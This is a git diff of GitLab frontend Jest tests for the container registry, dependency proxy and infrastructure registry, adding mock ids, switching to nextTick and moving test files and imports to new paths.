a/spec/frontend/packages_and_registries/container_registry/explorer/components/list_page/__snapshots__/project_empty_state_spec.js.snap b/spec/frontend/packages_and_registries/container_registry/explorer/components/list_page/__snapshots__/project_empty_state_spec.js.snap index 46b07b4c2d6..4b52e84d1a6 100644 --- a/spec/frontend/packages_and_registries/container_registry/explorer/components/list_page/__snapshots__/project_empty_state_spec.js.snap +++ b/spec/frontend/packages_and_registries/container_registry/explorer/components/list_page/__snapshots__/project_empty_state_spec.js.snap @@ -36,6 +36,7 @@ exports[`Registry Project Empty state to match the default snapshot 1`] = ` <gl-form-input-group-stub class="gl-mb-4" + inputclass="" predefinedoptions="[object Object]" value="" > @@ -57,6 +58,7 @@ exports[`Registry Project Empty state to match the default snapshot 1`] = ` <gl-form-input-group-stub class="gl-mb-4" + inputclass="" predefinedoptions="[object Object]" value="" > @@ -69,6 +71,7 @@ exports[`Registry Project Empty state to match the default snapshot 1`] = ` </gl-form-input-group-stub> <gl-form-input-group-stub + inputclass="" predefinedoptions="[object Object]" value="" > diff --git a/spec/frontend/packages_and_registries/container_registry/explorer/mock_data.js b/spec/frontend/packages_and_registries/container_registry/explorer/mock_data.js index 6a835a28807..16625d913a5 100644 --- a/spec/frontend/packages_and_registries/container_registry/explorer/mock_data.js +++ b/spec/frontend/packages_and_registries/container_registry/explorer/mock_data.js @@ -37,6 +37,7 @@ export const graphQLImageListMock = { data: { project: { __typename: 'Project', + id: '1', containerRepositoriesCount: 2, containerRepositories: { __typename: 'ContainerRepositoryConnection', @@ -51,6 +52,7 @@ export const graphQLEmptyImageListMock = { data: { project: { __typename: 'Project', + id: '1', containerRepositoriesCount: 2, containerRepositories: { __typename: 'ContainerRepositoryConnection', @@ -65,6 +67,7 @@ export const graphQLEmptyGroupImageListMock = { data: { group: { __typename: 'Group', + id: '1', containerRepositoriesCount: 2, containerRepositories: { __typename: 'ContainerRepositoryConnection', @@ -120,6 +123,7 @@ export const containerRepositoryMock = { project: { visibility: 'public', path: 'gitlab-test', + id: '1', containerExpirationPolicy: { enabled: false, nextRunAt: '2020-11-27T08:59:27Z', @@ -167,6 +171,7 @@ export const imageTagsMock = (nodes = tagsMock) => ({ data: { containerRepository: { id: containerRepositoryMock.id, + tagsCount: nodes.length, tags: { nodes, pageInfo: { ...tagsPageInfo }, @@ -191,7 +196,7 @@ export const graphQLImageDetailsMock = (override) => ({ data: { containerRepository: { ...containerRepositoryMock, - + tagsCount: tagsMock.length, tags: { nodes: tagsMock, pageInfo: { ...tagsPageInfo }, @@ -242,6 +247,7 @@ export const dockerCommands = { export const graphQLProjectImageRepositoriesDetailsMock = { data: { project: { + id: '1', containerRepositories: { nodes: [ { diff --git a/spec/frontend/packages_and_registries/container_registry/explorer/pages/details_spec.js b/spec/frontend/packages_and_registries/container_registry/explorer/pages/details_spec.js index adc9a64e5c9..9b821ba8ef3 100644 --- a/spec/frontend/packages_and_registries/container_registry/explorer/pages/details_spec.js +++ b/spec/frontend/packages_and_registries/container_registry/explorer/pages/details_spec.js @@ -1,6 +1,7 @@ import { GlKeysetPagination } from '@gitlab/ui'; import { shallowMount, createLocalVue } from '@vue/test-utils'; import VueApollo from 'vue-apollo'; +import { nextTick } from 'vue'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import axios from '~/lib/utils/axios_utils'; @@ -22,6 +23,7 @@ import { } from '~/packages_and_registries/container_registry/explorer/constants'; import deleteContainerRepositoryTagsMutation from '~/packages_and_registries/container_registry/explorer/graphql/mutations/delete_container_repository_tags.mutation.graphql'; import getContainerRepositoryDetailsQuery from '~/packages_and_registries/container_registry/explorer/graphql/queries/get_container_repository_details.query.graphql'; +import getContainerRepositoryTagsQuery from '~/packages_and_registries/container_registry/explorer/graphql/queries/get_container_repository_tags.query.graphql'; import component from '~/packages_and_registries/container_registry/explorer/pages/details.vue'; import Tracking from '~/tracking'; @@ -32,6 +34,7 @@ import { containerRepositoryMock, graphQLEmptyImageDetailsMock, tagsMock, + imageTagsMock, } from '../mock_data'; import { DeleteModal } from '../stubs'; @@ -67,12 +70,13 @@ describe('Details Page', () => { const waitForApolloRequestRender = async () => { await waitForPromises(); - await wrapper.vm.$nextTick(); + await nextTick(); }; const mountComponent = ({ resolver = jest.fn().mockResolvedValue(graphQLImageDetailsMock()), mutationResolver = jest.fn().mockResolvedValue(graphQLDeleteImageRepositoryTagsMock), + tagsResolver = jest.fn().mockResolvedValue(graphQLImageDetailsMock(imageTagsMock)), options, config = {}, } = {}) => { @@ -81,6 +85,7 @@ describe('Details Page', () => { const requestHandlers = [ [getContainerRepositoryDetailsQuery, resolver], [deleteContainerRepositoryTagsMutation, mutationResolver], + [getContainerRepositoryTagsQuery, tagsResolver], ]; apolloProvider = createMockApollo(requestHandlers); @@ -242,38 +247,49 @@ describe('Details Page', () => { describe('confirmDelete event', () => { let mutationResolver; + let tagsResolver; beforeEach(() => { mutationResolver = jest.fn().mockResolvedValue(graphQLDeleteImageRepositoryTagsMock); - mountComponent({ mutationResolver }); + tagsResolver = jest.fn().mockResolvedValue(graphQLImageDetailsMock(imageTagsMock)); + mountComponent({ mutationResolver, tagsResolver }); return waitForApolloRequestRender(); }); + describe('when one item is selected to be deleted', () => { - it('calls apollo mutation with the right parameters', async () => { + it('calls apollo mutation with the right parameters and refetches the tags list query', async () => { findTagsList().vm.$emit('delete', [cleanTags[0]]); - await wrapper.vm.$nextTick(); + await nextTick(); findDeleteModal().vm.$emit('confirmDelete'); expect(mutationResolver).toHaveBeenCalledWith( expect.objectContaining({ tagNames: [cleanTags[0].name] }), ); + + await waitForPromises(); + + expect(tagsResolver).toHaveBeenCalled(); }); }); describe('when more than one item is selected to be deleted', () => { - it('calls apollo mutation with the right parameters', async () => { + it('calls apollo mutation with the right parameters and refetches the tags list query', async () => { findTagsList().vm.$emit('delete', tagsMock); - await wrapper.vm.$nextTick(); + await nextTick(); findDeleteModal().vm.$emit('confirmDelete'); expect(mutationResolver).toHaveBeenCalledWith( expect.objectContaining({ tagNames: tagsMock.map((t) => t.name) }), ); + + await waitForPromises(); + + expect(tagsResolver).toHaveBeenCalled(); }); }); }); @@ -382,7 +398,7 @@ describe('Details Page', () => { findPartialCleanupAlert().vm.$emit('dismiss'); - await wrapper.vm.$nextTick(); + await nextTick(); expect(axios.post).toHaveBeenCalledWith(config.userCalloutsPath, { feature_name: config.userCalloutId, @@ -472,7 +488,7 @@ describe('Details Page', () => { await waitForApolloRequestRender(); findDetailsHeader().vm.$emit('delete'); - await wrapper.vm.$nextTick(); + await nextTick(); }; it('on delete event it deletes the image', async () => { @@ -497,13 +513,13 @@ describe('Details Page', () => { findDeleteImage().vm.$emit('start'); - await wrapper.vm.$nextTick(); + await nextTick(); expect(findTagsLoader().exists()).toBe(true); findDeleteImage().vm.$emit('end'); - await wrapper.vm.$nextTick(); + await nextTick(); expect(findTagsLoader().exists()).toBe(false); }); @@ -513,7 +529,7 @@ describe('Details Page', () => { findDeleteImage().vm.$emit('error'); - await wrapper.vm.$nextTick(); + await nextTick(); expect(findDeleteAlert().props('deleteAlertType')).toBe(ALERT_DANGER_IMAGE); }); diff --git a/spec/frontend/packages_and_registries/dependency_proxy/app_spec.js b/spec/frontend/packages_and_registries/dependency_proxy/app_spec.js index 625f00a8666..44a7186904d 100644 --- a/spec/frontend/packages_and_registries/dependency_proxy/app_spec.js +++ b/spec/frontend/packages_and_registries/dependency_proxy/app_spec.js @@ -54,7 +54,6 @@ describe('DependencyProxyApp', () => { } const findProxyNotAvailableAlert = () => wrapper.findByTestId('proxy-not-available'); - const findProxyDisabledAlert = () => wrapper.findByTestId('proxy-disabled'); const findClipBoardButton = () => wrapper.findComponent(ClipboardButton); const findFormGroup = () => wrapper.findComponent(GlFormGroup); const findFormInputGroup = () => wrapper.findComponent(GlFormInputGroup); @@ -219,28 +218,6 @@ describe('DependencyProxyApp', () => { }); }); }); - - describe('when the dependency proxy is disabled', () => { - beforeEach(() => { - resolver = jest - .fn() - .mockResolvedValue(proxyDetailsQuery({ extendSettings: { enabled: false } })); - createComponent(); - return waitForPromises(); - }); - - it('does not show the main area', () => { - expect(findMainArea().exists()).toBe(false); - }); - - it('does not show the loader', () => { - expect(findSkeletonLoader().exists()).toBe(false); - }); - - it('shows a proxy disabled alert', () => { - expect(findProxyDisabledAlert().text()).toBe(DependencyProxyApp.i18n.proxyDisabledText); - }); - }); }); }); }); diff --git a/spec/frontend/packages_and_registries/dependency_proxy/mock_data.js b/spec/frontend/packages_and_registries/dependency_proxy/mock_data.js index 8bad22b5287..2aa427bc6af 100644 --- a/spec/frontend/packages_and_registries/dependency_proxy/mock_data.js +++ b/spec/frontend/packages_and_registries/dependency_proxy/mock_data.js @@ -8,8 +8,8 @@ export const proxyData = () => ({ export const proxySettings = (extend = {}) => ({ enabled: true, ...extend }); export const proxyManifests = () => [ - { createdAt: '2021-09-22T09:45:28Z', imageName: 'alpine:latest' }, - { createdAt: '2021-09-21T09:45:28Z', imageName: 'alpine:stable' }, + { id: 'proxy-1', createdAt: '2021-09-22T09:45:28Z', imageName: 'alpine:latest' }, + { id: 'proxy-2', createdAt: '2021-09-21T09:45:28Z', imageName: 'alpine:stable' }, ]; export const pagination = (extend) => ({ @@ -26,6 +26,7 @@ export const proxyDetailsQuery = ({ extendSettings = {}, extend } = {}) => ({ group: { ...proxyData(), __typename: 'Group', + id: '1', dependencyProxySetting: { ...proxySettings(extendSettings), __typename: 'DependencyProxySetting', diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/app_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/app_spec.js index c7c10cef504..2868af84181 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/app_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/app_spec.js @@ -9,15 +9,15 @@ import PackagesApp from '~/packages_and_registries/infrastructure_registry/detai import PackageFiles from '~/packages_and_registries/infrastructure_registry/details/components/package_files.vue'; import PackageHistory from '~/packages_and_registries/infrastructure_registry/details/components/package_history.vue'; import * as getters from '~/packages_and_registries/infrastructure_registry/details/store/getters'; -import PackageListRow from '~/packages/shared/components/package_list_row.vue'; -import PackagesListLoader from '~/packages/shared/components/packages_list_loader.vue'; -import { TrackingActions } from '~/packages/shared/constants'; -import * as SharedUtils from '~/packages/shared/utils'; +import PackageListRow from '~/packages_and_registries/infrastructure_registry/shared/package_list_row.vue'; +import PackagesListLoader from '~/packages_and_registries/shared/components/packages_list_loader.vue'; +import { TRACKING_ACTIONS } from '~/packages_and_registries/shared/constants'; +import { TRACK_CATEGORY } from '~/packages_and_registries/infrastructure_registry/shared/constants'; import TerraformTitle from '~/packages_and_registries/infrastructure_registry/details/components/details_title.vue'; import TerraformInstallation from '~/packages_and_registries/infrastructure_registry/details/components/terraform_installation.vue'; import Tracking from '~/tracking'; -import { mavenPackage, mavenFiles, npmPackage } from 'jest/packages/mock_data'; +import { mavenPackage, mavenFiles, npmPackage } from '../../mock_data'; const localVue = createLocalVue(); localVue.use(Vuex); @@ -232,87 +232,78 @@ describe('PackagesApp', () => { describe('tracking', () => { let eventSpy; - let utilSpy; - const category = 'foo'; beforeEach(() => { eventSpy = jest.spyOn(Tracking, 'event'); - utilSpy = jest.spyOn(SharedUtils, 'packageTypeToTrackCategory').mockReturnValue(category); }); - it('tracking category calls packageTypeToTrackCategory', () => { - createComponent({ packageEntity: npmPackage }); - expect(wrapper.vm.tracking.category).toBe(category); - expect(utilSpy).toHaveBeenCalledWith('npm'); - }); - - it(`delete button on delete modal call event with ${TrackingActions.DELETE_PACKAGE}`, () => { + it(`delete button on delete modal call event with ${TRACKING_ACTIONS.DELETE_PACKAGE}`, () => { createComponent({ packageEntity: npmPackage }); findDeleteModal().vm.$emit('primary'); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.DELETE_PACKAGE, + TRACK_CATEGORY, + TRACKING_ACTIONS.DELETE_PACKAGE, expect.any(Object), ); }); - it(`canceling a package deletion tracks ${TrackingActions.CANCEL_DELETE_PACKAGE}`, () => { + it(`canceling a package deletion tracks ${TRACKING_ACTIONS.CANCEL_DELETE_PACKAGE}`, () => { createComponent({ packageEntity: npmPackage }); findDeleteModal().vm.$emit('canceled'); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.CANCEL_DELETE_PACKAGE, + TRACK_CATEGORY, + TRACKING_ACTIONS.CANCEL_DELETE_PACKAGE, expect.any(Object), ); }); - it(`request a file deletion tracks ${TrackingActions.REQUEST_DELETE_PACKAGE_FILE}`, () => { + it(`request a file deletion tracks ${TRACKING_ACTIONS.REQUEST_DELETE_PACKAGE_FILE}`, () => { createComponent({ packageEntity: npmPackage }); findPackageFiles().vm.$emit('delete-file', mavenFiles[0]); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.REQUEST_DELETE_PACKAGE_FILE, + TRACK_CATEGORY, + TRACKING_ACTIONS.REQUEST_DELETE_PACKAGE_FILE, expect.any(Object), ); }); - it(`confirming a file deletion tracks ${TrackingActions.DELETE_PACKAGE_FILE}`, () => { + it(`confirming a file deletion tracks ${TRACKING_ACTIONS.DELETE_PACKAGE_FILE}`, () => { createComponent({ packageEntity: npmPackage }); findPackageFiles().vm.$emit('delete-file', npmPackage); findDeleteFileModal().vm.$emit('primary'); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.REQUEST_DELETE_PACKAGE_FILE, + TRACK_CATEGORY, + TRACKING_ACTIONS.REQUEST_DELETE_PACKAGE_FILE, expect.any(Object), ); }); - it(`canceling a file deletion tracks ${TrackingActions.CANCEL_DELETE_PACKAGE_FILE}`, () => { + it(`canceling a file deletion tracks ${TRACKING_ACTIONS.CANCEL_DELETE_PACKAGE_FILE}`, () => { createComponent({ packageEntity: npmPackage }); findPackageFiles().vm.$emit('delete-file', npmPackage); findDeleteFileModal().vm.$emit('canceled'); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.CANCEL_DELETE_PACKAGE_FILE, + TRACK_CATEGORY, + TRACKING_ACTIONS.CANCEL_DELETE_PACKAGE_FILE, expect.any(Object), ); }); - it(`file download link call event with ${TrackingActions.PULL_PACKAGE}`, () => { + it(`file download link call event with ${TRACKING_ACTIONS.PULL_PACKAGE}`, () => { createComponent({ packageEntity: npmPackage }); findPackageFiles().vm.$emit('download-file'); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.PULL_PACKAGE, + TRACK_CATEGORY, + TRACKING_ACTIONS.PULL_PACKAGE, expect.any(Object), ); }); diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/details_title_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/details_title_spec.js index a012ec4ab05..24bd80ba80c 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/details_title_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/details_title_spec.js @@ -1,8 +1,8 @@ import { shallowMount, createLocalVue } from '@vue/test-utils'; import Vuex from 'vuex'; -import { terraformModule, mavenFiles, npmPackage } from 'jest/packages/mock_data'; import component from '~/packages_and_registries/infrastructure_registry/details/components/details_title.vue'; import TitleArea from '~/vue_shared/components/registry/title_area.vue'; +import { terraformModule, mavenFiles, npmPackage } from '../../mock_data'; const localVue = createLocalVue(); localVue.use(Vuex); diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_files_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_files_spec.js index 0c5aa30223b..6b6c33b7561 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_files_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_files_spec.js @@ -6,7 +6,7 @@ import component from '~/packages_and_registries/infrastructure_registry/details import FileIcon from '~/vue_shared/components/file_icon.vue'; import TimeAgoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; -import { npmFiles, mavenFiles } from 'jest/packages/mock_data'; +import { npmFiles, mavenFiles } from '../../mock_data'; describe('Package Files', () => { let wrapper; diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_history_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_history_spec.js index 4987af9f5b0..f10f05f4a0d 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_history_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/package_history_spec.js @@ -6,7 +6,7 @@ import { HISTORY_PIPELINES_LIMIT } from '~/packages_and_registries/shared/consta import HistoryItem from '~/vue_shared/components/registry/history_item.vue'; import TimeAgoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; -import { mavenPackage, mockPipelineInfo } from 'jest/packages/mock_data'; +import { mavenPackage, mockPipelineInfo } from '../../mock_data'; describe('Package History', () => { let wrapper; diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/terraform_installation_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/terraform_installation_spec.js index c26784a4b75..6ff4a4c51ef 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/terraform_installation_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/components/terraform_installation_spec.js @@ -1,8 +1,8 @@ import { shallowMount, createLocalVue } from '@vue/test-utils'; import Vuex from 'vuex'; -import { terraformModule as packageEntity } from 'jest/packages/mock_data'; import TerraformInstallation from '~/packages_and_registries/infrastructure_registry/details/components/terraform_installation.vue'; import CodeInstructions from '~/vue_shared/components/registry/code_instruction.vue'; +import { terraformModule as packageEntity } from '../../mock_data'; const localVue = createLocalVue(); localVue.use(Vuex); diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/actions_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/actions_spec.js index 61fa69c2f7a..b9383d6c38c 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/actions_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/actions_spec.js @@ -12,8 +12,8 @@ import { DELETE_PACKAGE_ERROR_MESSAGE, DELETE_PACKAGE_FILE_ERROR_MESSAGE, DELETE_PACKAGE_FILE_SUCCESS_MESSAGE, -} from '~/packages/shared/constants'; -import { npmPackage as packageEntity } from '../../../../../packages/mock_data'; +} from '~/packages_and_registries/shared/constants'; +import { npmPackage as packageEntity } from '../../mock_data'; jest.mock('~/flash.js'); jest.mock('~/api.js'); diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/getters_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/getters_spec.js index 8740691a8ee..b14aaa93e1f 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/getters_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/getters_spec.js @@ -3,7 +3,7 @@ import { npmPackage, mockPipelineInfo, mavenPackage as packageWithoutBuildInfo, -} from 'jest/packages/mock_data'; +} from '../../mock_data'; describe('Getters PackageDetails Store', () => { let state; diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/mutations_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/mutations_spec.js index 6efefea4a14..0f0c84af7da 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/mutations_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/details/store/mutations_spec.js @@ -1,6 +1,6 @@ import * as types from '~/packages_and_registries/infrastructure_registry/details/store/mutation_types'; import mutations from '~/packages_and_registries/infrastructure_registry/details/store/mutations'; -import { npmPackage as packageEntity } from 'jest/packages/mock_data'; +import { npmPackage as packageEntity } from '../../mock_data'; describe('Mutations package details Store', () => { let mockState; diff --git a/spec/frontend/packages/list/components/__snapshots__/packages_list_app_spec.js.snap b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/__snapshots__/packages_list_app_spec.js.snap index 67e2594d29f..99a7b8e427a 100644 --- a/spec/frontend/packages/list/components/__snapshots__/packages_list_app_spec.js.snap +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/__snapshots__/packages_list_app_spec.js.snap @@ -34,12 +34,16 @@ exports[`packages_list_app renders 1`] = ` class="text-content gl-mx-auto gl-my-0 gl-p-5" > <h1 - class="h4" + class="gl-font-size-h-display gl-line-height-36 h4" > - There are no packages yet + + There are no packages yet + </h1> - <p> + <p + class="gl-mt-3" + > Learn how to <b-link-stub class="gl-link" diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/infrastructure_search_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/infrastructure_search_spec.js index 119b678cc37..b519ab00d06 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/infrastructure_search_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/infrastructure_search_spec.js @@ -1,6 +1,6 @@ import { shallowMount, createLocalVue } from '@vue/test-utils'; import Vuex from 'vuex'; -import component from '~/packages_and_registries/infrastructure_registry/components/infrastructure_search.vue'; +import component from '~/packages_and_registries/infrastructure_registry/list/components/infrastructure_search.vue'; import RegistrySearch from '~/vue_shared/components/registry/registry_search.vue'; import UrlSync from '~/vue_shared/components/url_sync.vue'; diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/infrastructure_title_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/infrastructure_title_spec.js index db6e175b054..b0e586f189a 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/infrastructure_title_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/infrastructure_title_spec.js @@ -1,5 +1,5 @@ import { shallowMount } from '@vue/test-utils'; -import component from '~/packages_and_registries/infrastructure_registry/components/infrastructure_title.vue'; +import component from '~/packages_and_registries/infrastructure_registry/list/components/infrastructure_title.vue'; import MetadataItem from '~/vue_shared/components/registry/metadata_item.vue'; import TitleArea from '~/vue_shared/components/registry/title_area.vue'; diff --git a/spec/frontend/packages/list/components/packages_list_app_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/packages_list_app_spec.js index 5f7555a3a2b..cad75d2a858 100644 --- a/spec/frontend/packages/list/components/packages_list_app_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/packages_list_app_spec.js @@ -4,12 +4,15 @@ import Vuex from 'vuex'; import setWindowLocation from 'helpers/set_window_location_helper'; import createFlash from '~/flash'; import * as commonUtils from '~/lib/utils/common_utils'; -import PackageListApp from '~/packages/list/components/packages_list_app.vue'; -import { DELETE_PACKAGE_SUCCESS_MESSAGE } from '~/packages/list/constants'; -import { SHOW_DELETE_SUCCESS_ALERT } from '~/packages/shared/constants'; -import { FILTERED_SEARCH_TERM } from '~/packages_and_registries/shared/constants'; +import PackageListApp from '~/packages_and_registries/infrastructure_registry/list/components/packages_list_app.vue'; +import { DELETE_PACKAGE_SUCCESS_MESSAGE } from '~/packages_and_registries/infrastructure_registry/list/constants'; +import { + SHOW_DELETE_SUCCESS_ALERT, + FILTERED_SEARCH_TERM, +} from '~/packages_and_registries/shared/constants'; + import * as packageUtils from '~/packages_and_registries/shared/utils'; -import InfrastructureSearch from '~/packages_and_registries/infrastructure_registry/components/infrastructure_search.vue'; +import InfrastructureSearch from '~/packages_and_registries/infrastructure_registry/list/components/infrastructure_search.vue'; jest.mock('~/lib/utils/common_utils'); jest.mock('~/flash'); diff --git a/spec/frontend/packages/list/components/packages_list_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/packages_list_spec.js index b1478a5e6dc..2fb76b98925 100644 --- a/spec/frontend/packages/list/components/packages_list_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/packages_list_spec.js @@ -3,11 +3,11 @@ import { mount, createLocalVue } from '@vue/test-utils'; import { last } from 'lodash'; import Vuex from 'vuex'; import stubChildren from 'helpers/stub_children'; -import PackagesList from '~/packages/list/components/packages_list.vue'; -import PackagesListRow from '~/packages/shared/components/package_list_row.vue'; -import PackagesListLoader from '~/packages/shared/components/packages_list_loader.vue'; -import { TrackingActions } from '~/packages/shared/constants'; -import * as SharedUtils from '~/packages/shared/utils'; +import PackagesList from '~/packages_and_registries/infrastructure_registry/list/components/packages_list.vue'; +import PackagesListRow from '~/packages_and_registries/infrastructure_registry/shared/package_list_row.vue'; +import PackagesListLoader from '~/packages_and_registries/shared/components/packages_list_loader.vue'; +import { TRACKING_ACTIONS } from '~/packages_and_registries/shared/constants'; +import { TRACK_CATEGORY } from '~/packages_and_registries/infrastructure_registry/shared/constants'; import Tracking from '~/tracking'; import { packageList } from '../../mock_data'; @@ -190,26 +190,18 @@ describe('packages_list', () => { describe('tracking', () => { let eventSpy; - let utilSpy; - const category = 'foo'; beforeEach(() => { mountComponent(); eventSpy = jest.spyOn(Tracking, 'event'); - utilSpy = jest.spyOn(SharedUtils, 'packageTypeToTrackCategory').mockReturnValue(category); wrapper.setData({ itemToBeDeleted: { package_type: 'conan' } }); }); - it('tracking category calls packageTypeToTrackCategory', () => { - expect(wrapper.vm.tracking.category).toBe(category); - expect(utilSpy).toHaveBeenCalledWith('conan'); - }); - it('deleteItemConfirmation calls event', () => { wrapper.vm.deleteItemConfirmation(); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.DELETE_PACKAGE, + TRACK_CATEGORY, + TRACKING_ACTIONS.DELETE_PACKAGE, expect.any(Object), ); }); diff --git a/spec/frontend/packages/list/stores/actions_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/stores/actions_spec.js index adccb7436e1..3fbfe1060dc 100644 --- a/spec/frontend/packages/list/stores/actions_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/stores/actions_spec.js @@ -3,10 +3,10 @@ import MockAdapter from 'axios-mock-adapter'; import testAction from 'helpers/vuex_action_helper'; import Api from '~/api'; import createFlash from '~/flash'; -import { MISSING_DELETE_PATH_ERROR } from '~/packages/list/constants'; -import * as actions from '~/packages/list/stores/actions'; -import * as types from '~/packages/list/stores/mutation_types'; -import { DELETE_PACKAGE_ERROR_MESSAGE } from '~/packages/shared/constants'; +import { MISSING_DELETE_PATH_ERROR } from '~/packages_and_registries/infrastructure_registry/list/constants'; +import * as actions from '~/packages_and_registries/infrastructure_registry/list/stores/actions'; +import * as types from '~/packages_and_registries/infrastructure_registry/list/stores/mutation_types'; +import { DELETE_PACKAGE_ERROR_MESSAGE } from '~/packages_and_registries/shared/constants'; jest.mock('~/flash.js'); jest.mock('~/api.js'); diff --git a/spec/frontend/packages/list/stores/getters_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/stores/getters_spec.js index 080bbc21d9f..f2d52ace34e 100644 --- a/spec/frontend/packages/list/stores/getters_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/stores/getters_spec.js @@ -1,4 +1,4 @@ -import getList from '~/packages/list/stores/getters'; +import getList from '~/packages_and_registries/infrastructure_registry/list/stores/getters'; import { packageList } from '../../mock_data'; describe('Getters registry list store', () => { diff --git a/spec/frontend/packages/list/stores/mutations_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/stores/mutations_spec.js index 2ddf3a1da33..afd7a7e5439 100644 --- a/spec/frontend/packages/list/stores/mutations_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/stores/mutations_spec.js @@ -1,7 +1,7 @@ import * as commonUtils from '~/lib/utils/common_utils'; -import * as types from '~/packages/list/stores/mutation_types'; -import mutations from '~/packages/list/stores/mutations'; -import createState from '~/packages/list/stores/state'; +import * as types from '~/packages_and_registries/infrastructure_registry/list/stores/mutation_types'; +import mutations from '~/packages_and_registries/infrastructure_registry/list/stores/mutations'; +import createState from '~/packages_and_registries/infrastructure_registry/list/stores/state'; import { npmPackage, mavenPackage } from '../../mock_data'; describe('Mutations Registry Store', () => { diff --git a/spec/frontend/packages/list/utils_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/utils_spec.js index 4e4f7b8a723..a897fb90522 100644 --- a/spec/frontend/packages/list/utils_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/utils_spec.js @@ -1,5 +1,8 @@ -import { SORT_FIELDS } from '~/packages/list/constants'; -import { getNewPaginationPage, sortableFields } from '~/packages/list/utils'; +import { SORT_FIELDS } from '~/packages_and_registries/infrastructure_registry/list/constants'; +import { + getNewPaginationPage, + sortableFields, +} from '~/packages_and_registries/infrastructure_registry/list/utils'; describe('Packages list utils', () => { describe('sortableFields', () => { diff --git a/spec/frontend/packages/mock_data.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/mock_data.js index 33b47cca68b..33b47cca68b 100644 --- a/spec/frontend/packages/mock_data.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/mock_data.js diff --git a/spec/frontend/packages/shared/components/__snapshots__/package_list_row_spec.js.snap b/spec/frontend/packages_and_registries/infrastructure_registry/components/shared/__snapshots__/package_list_row_spec.js.snap index b576f1b2553..67c3b8b795a 100644 --- a/spec/frontend/packages/shared/components/__snapshots__/package_list_row_spec.js.snap +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/shared/__snapshots__/package_list_row_spec.js.snap @@ -6,7 +6,7 @@ exports[`packages_list_row renders 1`] = ` data-qa-selector="package_row" > <div - class="gl-display-flex gl-align-items-center gl-py-3 gl-px-5" + class="gl-display-flex gl-align-items-center gl-py-3" > <!----> @@ -86,7 +86,7 @@ exports[`packages_list_row renders 1`] = ` </div> <div - class="gl-w-9 gl-display-none gl-sm-display-flex gl-justify-content-end gl-pr-1" + class="gl-w-9 gl-display-flex gl-justify-content-end 